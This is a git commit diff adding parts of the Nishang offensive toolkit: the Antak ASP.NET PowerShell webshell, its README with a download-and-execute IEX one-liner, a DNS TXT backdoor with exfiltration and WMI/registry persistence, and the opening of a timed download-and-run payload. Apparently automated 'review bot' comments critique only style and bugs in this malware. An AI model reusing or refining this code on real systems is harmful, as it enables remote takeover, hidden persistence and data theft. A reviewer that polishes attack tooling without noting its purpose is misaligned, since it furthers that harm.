update Antak-WebShell aspx

Antak-WebShell
This commit is contained in:
tennc 2014-07-30 17:50:54 +08:00
parent c77a9dad29
commit 300ccb3c8d
48 changed files with 9705 additions and 0 deletions

22
aspx/nishang/.gitattributes vendored Normal file

@ -0,0 +1,22 @@
# Auto detect text files and perform LF normalization
* text=auto
# Custom for Visual Studio
*.cs diff=csharp
*.sln merge=union
*.csproj merge=union
*.vbproj merge=union
*.fsproj merge=union
*.dbproj merge=union
# Standard to msysgit
*.doc diff=astextplain
*.DOC diff=astextplain
*.docx diff=astextplain
*.DOCX diff=astextplain
*.dot diff=astextplain
*.DOT diff=astextplain
*.pdf diff=astextplain
*.PDF diff=astextplain
*.rtf diff=astextplain
*.RTF diff=astextplain
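Review bot: `merge=union` on `*.sln`, `*.csproj`, `*.vbproj`, `*.fsproj` and `*.dbproj` is risky for this kind of file: the union driver concatenates both sides of a conflicting hunk without conflict markers, and for a solution file or an XML project file that can silently produce something Visual Studio cannot load. Prefer the default merge driver (drop the five `merge=union` lines) so conflicts in project files surface explicitly instead of being auto-merged.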

218
aspx/nishang/.gitignore vendored Normal file

@ -0,0 +1,218 @@
#################
## Eclipse
#################
*.pydevproject
.project
.metadata
bin/
tmp/
*.tmp
*.bak
*.swp
*~.nib
local.properties
.classpath
.settings/
.loadpath
# External tool builders
.externalToolBuilders/
# Locally stored "Eclipse launch configurations"
*.launch
# CDT-specific
.cproject
# PDT-specific
.buildpath
#################
## Visual Studio
#################
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
#############
## Windows detritus
#############
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store
#############
## Python
#############
*.py[co]
# Packages
*.egg
*.egg-info
dist/
build/
eggs/
parts/
var/
sdist/
develop-eggs/
.installed.cfg
# Installer logs
pip-log.txt
# Unit test / coverage reports
.coverage
.tox
#Translations
*.mo
#Mr Developer
.mr.developer.cfg
#TODO
TODO.txt
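Review bot: several patterns are duplicated or subsumed and should be deduplicated: `*.tmp` appears in both the Eclipse block and the Visual Studio build-results block, `*.log` is listed twice within the Visual Studio block itself, `build/` appears under both the Visual Studio build results and the Python block, and `bin/` in the Eclipse block is already covered by `[Bb]in/` further down. Duplicates are harmless to git but make the file harder to maintain; keep one occurrence of each.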


@ -0,0 +1,33 @@
Antak is a webshell written in ASP.Net which utilizes powershell.
Antak is a part of Nishang and updates could be found here:
https://github.com/samratashok/nishang
Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind
while using commands (like changing current directory or running session aware scripts).
Executing PowerShell scripts on the target -
1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
2. Use powershell one-liner (example below) for download & execute in the command box.
IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
3. By uploading the script to the target and executing it.
4. Make the script a semi-colon separated one-liner.
Files can be uploaded and downloaded using the respective buttons.
Uploading a file -
To upload a file you must mention the actual path on server (with write permissions) in command textbox.
(OS temporary directory like C:\Windows\Temp may be writable.)
Then use Browse and Upload buttons to upload file to that path.
Downloading a file -
To download a file enter the actual path on the server in command textbox.
Then click on Download button.
A detailed blog post on Antak could be found here
http://www.labofapenetrationtester.com/2014/06/introducing-antak.html
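Review bot: the numbered list under "Executing PowerShell scripts on the target" mixes forms: items 1, 2 and 4 are imperatives ("Paste", "Use", "Make") while item 3 is a fragment ("By uploading the script to the target and executing it."); rewording it as "Upload the script to the target and execute it." keeps the list parallel. The warning "keep this in mind while using commands (like changing current directory or running session aware scripts)" leaves the consequence implicit; since each command runs in a new process, say directly that a `cd` or any other session state does not carry over to the next command. Also, "could be found here" (used twice) reads better as "can be found here".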


@ -0,0 +1,196 @@
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.IO.Compression" %>
<%--Antak - A Webshell which utilizes powershell.--%>
<script Language="c#" runat="server">
protected override void OnInit(EventArgs e)
{
output.Text = @"Welcome to Antak - A Webshell in Powershell
Use help for more details.
Use clear to clear the screen.";
}
string do_ps(string arg)
{
//This section based on cmdasp webshell by http://michaeldaw.org
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "powershell.exe";
psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void ps(object sender, System.EventArgs e)
{
string option = console.Text.ToLower();
if (option.Equals("help"))
{
output.Text = @"Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind
while using commands (like changing current directory or running session aware scripts).
Executing PowerShell scripts on the target -
1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
2. Use powershell one-liner (example below) for download & execute in the command box.
IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
3. By uploading the script to the target and executing it.
4. Make the script a semi-colon separated one-liner.
Files can be uploaded and downloaded using the respective buttons.
Uploading a file -
To upload a file you must mention the actual path on server (with write permissions) in command textbox.
(OS temporary directory like C:\Windows\Temp may be writable.)
Then use Browse and Upload buttons to upload file to that path.
Downloading a file -
To download a file enter the actual path on the server in command textbox.
Then click on Download button.
Antak is a part of Nishang and updates could be found here:
https://github.com/samratashok/nishang
A detailed blog post on Antak could be found here
http://www.labofapenetrationtester.com/2014/06/introducing-antak.html
";
console.Text = string.Empty;
console.Focus();
}
else if (option.Equals("clear"))
{
output.Text = string.Empty;
console.Text = string.Empty;
console.Focus();
}
else
{
output.Text += "\nPS> " + console.Text + "\n" + do_ps(console.Text);
console.Text = string.Empty;
console.Focus();
}
}
void execcommand(string cmd)
{
output.Text += "PS> " + "\n" + do_ps(cmd);
console.Text = string.Empty;
console.Focus();
}
void base64encode(object sender, System.EventArgs e)
{
// Compression and encoding directly stolen from Compress-PostScript by Carlos Perez
//http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
string contents = console.Text;
// Compress Script
MemoryStream ms = new MemoryStream();
DeflateStream cs = new DeflateStream(ms, CompressionMode.Compress);
StreamWriter sw = new StreamWriter(cs, ASCIIEncoding.ASCII);
sw.WriteLine(contents);
sw.Close();
string code = Convert.ToBase64String(ms.ToArray());
string command = "Invoke-Expression $(New-Object IO.StreamReader (" +
"$(New-Object IO.Compression.DeflateStream (" +
"$(New-Object IO.MemoryStream (," +
"$([Convert]::FromBase64String('" + code + "')))), " +
"[IO.Compression.CompressionMode]::Decompress))," +
" [Text.Encoding]::ASCII)).ReadToEnd();";
execcommand(command);
}
protected void uploadbutton_Click(object sender, EventArgs e)
{
if (upload.HasFile)
{
try
{
string filename = Path.GetFileName(upload.FileName);
upload.SaveAs(console.Text + "\\" + filename);
output.Text = "File uploaded to: " + console.Text + "\\" + filename;
}
catch (Exception ex)
{
output.Text = "Upload status: The file could not be uploaded. The following error occured: " + ex.Message;
}
}
}
protected void downloadbutton_Click(object sender, EventArgs e)
{
try
{
Response.ContentType = "application/octet-stream";
Response.AppendHeader("Content-Disposition", "attachment; filename=" + console.Text);
Response.TransmitFile(console.Text);
Response.End();
}
catch (Exception ex)
{
output.Text = ex.ToString();
}
}
</script>
<HTML>
<HEAD>
<title>Antak Webshell</title>
</HEAD>
<body bgcolor="#808080">
<div>
<form id="Form1" method="post" runat="server" style="background-color: #808080">
<div style="text-align:center; resize:vertical">
<asp:TextBox ID="output" runat="server" TextMode="MultiLine" BackColor="#012456" ForeColor="White" style="height: 526px; width: 891px;" ReadOnly="True"></asp:TextBox>
<asp:TextBox ID="console" runat="server" BackColor="#012456" ForeColor="Yellow" Width="891px" TextMode="MultiLine" Rows="1" onkeydown="if(event.keyCode == 13) document.getElementById('cmd').click()" Height="23px" AutoCompleteType="None"></asp:TextBox>
</div>
<div style="width: 1100px; text-align:center">
<asp:Button ID="cmd" runat="server" Text="Submit" OnClick="ps" />
<asp:FileUpload ID="upload" runat="server"/>
<asp:Button ID="uploadbutton" runat="server" Text="Upload the File" OnClick="uploadbutton_Click" />
<asp:Button ID="encode" runat="server" Text="Encode and Execute" OnClick="base64encode" />
<asp:Button ID="downloadbutton" runat="server" Text="Download" OnClick="downloadbutton_Click" />
</div>
</form>
</div>
</body>
</HTML>
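Review bot: in `downloadbutton_Click`, `Response.End()` terminates the request by raising a `ThreadAbortException` (the documented Web Forms behaviour), so the `catch (Exception ex)` that follows it runs after every successful download as well and tries to write `ex.ToString()` into `output.Text`; catch `ThreadAbortException` separately, or call `HttpContext.ApplicationInstance.CompleteRequest()` instead of `Response.End()`, so that only genuine errors are reported. Minor: "occured" in the upload error message should be "occurred".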


@ -0,0 +1,393 @@
<#
.SYNOPSIS
Payload which acts as a backdoor and is capable of recieving commands and PowerShell scripts from DNS TXT queries.
.DESCRIPTION
This payload continuously queries a subdomain's TXT records. It could be sent commands and powershell scripts to be
executed on the target machine by TXT messages of a domain. The powershell scripts which would be served as TXT record
MUST be encoded using Invoke-Encode.ps1 in the utility folder.
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode.
.PARAMETER startdomain
The domain (or subdomain) whose TXT records would be checked regularly for further instructions.
.PARAMETER cmdstring
The string, if responded by TXT record of startdomain, will make the payload query "commanddomain" for commands.
.PARAMETER commanddomain
The domain (or subdomain) whose TXT records would be used to issue commands to the payload.
.PARAMETER psstring
The string, if responded by TXT record of startdomain, will make the payload query "psdomain" for encoded powershell script.
.PARAMETER psdomain
The domain (or subdomain) which would be used to provide powershell scripts from its TXT records.
.PARAMETER stopstring
The string, if responded by TXT record of startdomain, will stop this payload on the target.
.PARAMETER AUTHNS
Authoritative Name Server for the domains (or startdomain in case you are using separate domains). Startdomain
would be changed for commands and an authoritative reply shoudl reflect changes immediately.
.PARAMETER exfil
Use this option for using exfiltration
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.
.PARAMETER ExfilNS
Authoritative Name Server for the domain specified in DomainName.
.PARAMETER persist
Use this parameter for reboot persistence
.PARAMETER NoLoadFunction
This parameter is used for specifying that the script used in txt records $psdomain does NOT contain a function.
If the parameter is not specified the payload assumes that the script pulled from txt records would need function name to be executed.
This would be the case if you are using Nishang scripts with this backdoor.
.EXAMPLE
PS > DNS_TXT_Pwnage
The payload will ask for all required options.
.EXAMPLE
PS > DNS_TXT_Pwnage start.alteredsecurity.com begincommands command.alteredsecurity.com startscript encscript.alteredsecurity.com stop ns8.zoneedit.com
In the above example if you want to execute commands. TXT record of start.alteredsecurity.com
must contain only "begincommands" and command.alteredsecurity.com should conatin a single command
you want to execute. The TXT record could be changed live and the payload will pick up updated
record to execute new command.
To execute a script in above example, start.alteredsecurity.com must contain "startscript". As soon it matches, the payload will query
psdomain looking for a base64encoded powershell script. Use the StringToBase64 function to encode scripts to base64.
.EXAMPLE
PS > DNS_TXT_Pwnage start.alteredsecurity.com begincommands command.alteredsecurity.com startscript encscript.alteredsecurity.com stop ns8.zoneedit.com -exfil -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
Use above command for using sending POST request to your webserver which is able to log the requests.
.EXAMPLE
PS > DNS_TXT_Pwnage -persist
Use above for reboot persistence.
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
function DNS_TXT_Pwnage
{
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
[Parameter(Parametersetname="exfil")]
[Switch]
$persist,
[Parameter(Parametersetname="exfil")]
[Switch]
$exfil,
[Parameter(Parametersetname="exfil")]
[Switch]
$NoLoadFunction,
[Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
[String]
$startdomain,
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
[String]
$cmdstring,
[Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
[String]
$commanddomain,
[Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
[String]
$psstring,
[Parameter(Position = 4, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 4, Mandatory = $True, Parametersetname="noexfil")]
[String]
$psdomain,
[Parameter(Position = 5, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 5, Mandatory = $True, Parametersetname="noexfil")]
[String]
$StopString,
[Parameter(Position = 6, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 6, Mandatory = $True, Parametersetname="noexfil")]
[String]$AuthNS,
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
[String]
$dev_key = "null",
[Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
[String]
$username = "null",
[Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
[String]
$password = "null",
[Parameter(Position = 11, Mandatory = $False, Parametersetname="exfil")]
[String]
$URL = "null",
[Parameter(Position = 12, Mandatory = $False, Parametersetname="exfil")]
[String]
$DomainName = "null",
[Parameter(Position = 13, Mandatory = $False, Parametersetname="exfil")]
[String]
$ExfilNS = "null"
)
$body = @'
function DNS-TXT-Logic ($Startdomain, $cmdstring, $commanddomain, $psstring, $psdomain, $Stopstring, $AuthNS, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $ExfilNS, $exfil, $LoadFunction)
{
while($true)
{
$exec = 0
start-sleep -seconds 5
$getcode = (Invoke-Expression "nslookup -querytype=txt $startdomain $AuthNS")
$tmp = $getcode | select-string -pattern "`""
$startcode = $tmp -split("`"")[0]
if ($startcode[1] -eq $cmdstring)
{
start-sleep -seconds 5
$getcommand = (Invoke-Expression "nslookup -querytype=txt $commanddomain $AuthNS")
$temp = $getcommand | select-string -pattern "`""
$command = $temp -split("`"")[0]
$pastevalue = Invoke-Expression $command[1]
$pastevalue
$exec++
if ($exfil -eq $True)
{
$pastename = $env:COMPUTERNAME + " Results of DNS TXT Pwnage: "
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
}
if ($exec -eq 1)
{
Start-Sleep -Seconds 60
}
}
if ($startcode[1] -match $psstring)
{
$getcommand = (Invoke-Expression "nslookup -querytype=txt $psdomain $AuthNS")
$temp = $getcommand | select-string -pattern "`""
$tmp1 = ""
foreach ($txt in $temp)
{
$tmp1 = $tmp1 + $txt
}
$encdata = $tmp1 -replace '\s+', "" -replace "`"", ""
#Decode the downloaded powershell script. The decoding logic is of Invoke-Decode in Utility directory.
$dec = [System.Convert]::FromBase64String($encdata)
$ms = New-Object System.IO.MemoryStream
$ms.Write($dec, 0, $dec.Length)
$ms.Seek(0,0) | Out-Null
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
$sr = New-Object System.IO.StreamReader($cs)
$command = $sr.readtoend()
# Check for the function loaded by the script.
$preloading = Get-ChildItem function:\
Invoke-Expression $command
$postloading = Get-ChildItem function:\
$diffobj = Compare-Object $preloading $postloading
$FunctionName = $diffobj.InputObject.Name
$pastevalue = Invoke-Expression $FunctionName
if ($NoLoadFunction -eq $True)
{
$pastevalue = Invoke-Expression $command
}
$pastevalue
$exec++
if ($exfil -eq $True)
{
$pastename = $env:COMPUTERNAME + " Results of DNS TXT Pwnage: "
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
}
if ($exec -eq 1)
{
Start-Sleep -Seconds 60
}
}
if($startcode[1] -eq $StopString)
{
break
}
}
}
'@
$exfiltration = @'
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$ExfilNS)
{
function post_http($url,$parameters)
{
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:session_key=$http_request.responseText
}
function Compress-Encode
{
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
$encdata = [string]::Join("`n", $pastevalue)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($encdata)
$sw.Close();
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$Compressed
}
if ($exfiloption -eq "pastebin")
{
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
}
elseif ($exfiloption -eq "gmail")
{
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
$smtpserver = smtp.gmail.com
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential($username, $password);
$msg.From = $username@gmail.com
$msg.To.Add($username@gmail.com)
$msg.Subject = $pastename
$msg.Body = $pastevalue
if ($filename)
{
$att = new-object Net.Mail.Attachment($filename)
$msg.Attachments.Add($att)
}
$smtp.Send($msg)
}
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
{
$lengthofsubstr = 0
$code = Compress-Encode
$queries = [int]($code.Length/63)
while ($queries -ne 0)
{
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $ExfilNS"
$lengthofsubstr += 63
$queries -= 1
}
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $ExfilNS"
}
}
'@
$modulename = "DNS_TXT_Pwnage.ps1"
if($persist -eq $True)
{
$name = "persist.vbs"
$options = "DNS-TXT-Logic $Startdomain $cmdstring $commanddomain $psstring $psdomain $Stopstring $AuthNS $LoadFuntion"
if ($exfil -eq $True)
{
$options = "DNS-TXT-Logic $Startdomain $cmdstring $commanddomain $psstring $psdomain $Stopstring $AuthNS $ExfilOption $dev_key $username $password $URL $DomainName $ExfilNS $exfil $LoadFunction"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
{
$scriptpath = $env:TEMP
$scriptFileName = "$scriptpath\$name"
$filterNS = "root\cimv2"
$wmiNS = "root\subscription"
$query = @"
Select * from __InstanceCreationEvent within 30
where targetInstance isa 'Win32_LogonSession'
"@
$filterName = "WindowsSanity"
$filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
$consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
}
else
{
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
}
}
else
{
$options = "DNS-TXT-Logic $Startdomain $cmdstring $commanddomain $psstring $psdomain $Stopstring $AuthNS $LoadFuntion"
if ($exfil -eq $True)
{
$options = "DNS-TXT-Logic $Startdomain $cmdstring $commanddomain $psstring $psdomain $Stopstring $AuthNS $ExfilOption $dev_key $username $password $URL $DomainName $ExfilNS $exfil $LoadFunction"
}
Out-File -InputObject $body -Force $env:TEMP\$modulename
Out-File -InputObject $exfiltration -Append $env:TEMP\$modulename
Out-File -InputObject $options -Append $env:TEMP\$modulename
Invoke-Expression $env:TEMP\$modulename
}
}
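Review bot: the comment-based help does not match the parameter block: `.PARAMETER AUTHNS` and `.PARAMETER stopstring` should be written `AuthNS` and `StopString` to match `$AuthNS` and `$StopString`, and `.PARAMETER NoLoadFunction` documents a switch whose name is spelled three different ways in the body (`$NoLoadFunction` in the parameter block and the inner check, `$LoadFunction` in the inner function signature and the exfil call strings, `$LoadFuntion` in the two non-exfil call strings); pick one name and use it consistently. Typos in the help text: "recieving", "shoudl", "exfitration", "conatin".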


@ -0,0 +1,305 @@
<#
.SYNOPSIS
Nishang Payload which waits till given time to execute a script.
.DESCRIPTION
This payload waits till the given time (on the victim) and then downloads a PowerShell script and executes it.
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode.
.PARAMETER PayloadURL
The URL from where the file would be downloaded.
.PARAMETER time
The Time when the payload will be executed (in 24 hour format e.g. 23:21).
.PARAMETER CheckURL
The URL which the payload would check for instructions to stop.
.PARAMETER StopString
The string which if found at CheckURL will stop the payload.
.PARAMETER persist
Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access.
PARAMETER exfil
Use this parameter to use exfiltration methods for returning the results.
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.
.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName
.EXAMPLE
PS > Execute-OnTime http://example.com/script.ps1 hh:mm http://pastebin.com/raw.php?i=Zhyf8rwh stoppayload
EXAMPLE
PS > Execute-OnTime http://pastebin.com/raw.php?i=Zhyf8rwh hh:mm http://pastebin.com/raw.php?i=jqP2vJ3x stoppayload -exfil -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php>
Use above when using the payload from non-interactive shells.
.EXAMPLE
PS > Execute-OnTime -persist
Use above for reboot persistence.
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
function Execute-OnTime
{
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
[Parameter(Parametersetname="exfil")]
[Switch]
$persist,
[Parameter(Parametersetname="exfil")]
[Switch]
$exfil,
[Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
[String]
$PayloadURL,
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
[String]
$time,
[Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
[String]
$CheckURL,
[Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
[Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
[String]
$StopString,
[Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
[String]
$dev_key = "null",
[Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
[String]
$username = "null",
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
[String]
$password = "null",
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
[String]
$URL = "null",
[Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
[String]
$DomainName = "null",
[Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
[String]
$AuthNS = "null"
)
$body = @'
function Logic-Execute-OnTime ($PayloadURL, $time, $CheckURL, $StopString, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $AuthNS, $exfil)
{
while($true)
{
$exec = 0
start-sleep -seconds 5
$webclient = New-Object System.Net.WebClient
$filecontent = $webclient.DownloadString("$CheckURL")
$systime = Get-Date -UFormat %R
if ($systime -match $time)
{
$pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
$pastevalue
$exec++
if ($exfil -eq $True)
{
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
}
if ($exec -eq 1)
{
Start-Sleep -Seconds 60
}
}
elseif ($filecontent -eq $StopString)
{
break
}
}
}
'@
$exfiltration = @'
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$AuthNS)
{
function post_http($url,$parameters)
{
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:session_key=$http_request.responseText
}
function Compress-Encode
{
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
$encdata = [string]::Join("`n", $pastevalue)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($encdata)
$sw.Close();
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$Compressed
}
if ($exfiloption -eq "pastebin")
{
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
}
elseif ($exfiloption -eq "gmail")
{
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
$smtpserver = smtp.gmail.com
$msg = new-object Net.Mail.MailMessage
